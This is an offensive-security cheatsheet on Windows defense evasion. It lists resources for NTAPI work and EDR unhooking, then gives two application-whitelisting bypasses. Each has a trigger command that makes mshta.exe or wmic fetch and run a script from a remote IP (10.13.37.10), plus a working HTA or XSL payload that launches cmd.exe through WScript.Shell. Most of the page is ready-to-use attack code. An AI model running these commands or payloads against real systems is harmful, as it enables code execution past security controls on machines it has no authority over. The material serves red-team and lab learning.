Defense Evasion
A cheatsheet for Defense Evasion targeting techniques to bypass security measures, including application whitelisting, using HTA and XSL scripts.
Author: otter
Defense Evasion
Useful Links
- Win32 API docs
- NTAPI Undocumented Functions
- Kernel-specific structures (pick the right kernel version / update)
-
DLL download for Unhooking (download URL structure is
https://msdl.microsoft.com/download/symbols/name.dll/{IMAGE_FILE_HEADER.TimeDateStamp}{IMAGE_OPTIONAL_HEADER.SizeOfImage}/name.dll) - All in one NTAPI documentation and references
- DotNet2JScript - A library used to encode DLL's to feed into other bypass projects.
APPLocker / Application Whitelisting Bypass
HTA
Trigger - C:\Windows\System32\mshta.exe http://10.13.37.10/cmd.hta
<head>
<script language="JScript">
var shell = new ActiveXObject("WScript.Shell");
var res = shell.Run("cmd.exe");
</script>
</head>
<body>
<script language="JScript">
self.close();
</script>
</body>
</html>
XSL
Trigger - wmic process get brief /format:"http://10.13.37.10/cmd.xsl"
<?xml version='1.0'?>
<stylesheet version="1.0"
xmlns="http://www.w3.org/1999/XSL/Transform"
xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="http://mycompany.com/mynamespace">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell");
r.Run("cmd.exe");
]]>
</ms:script>
</stylesheet>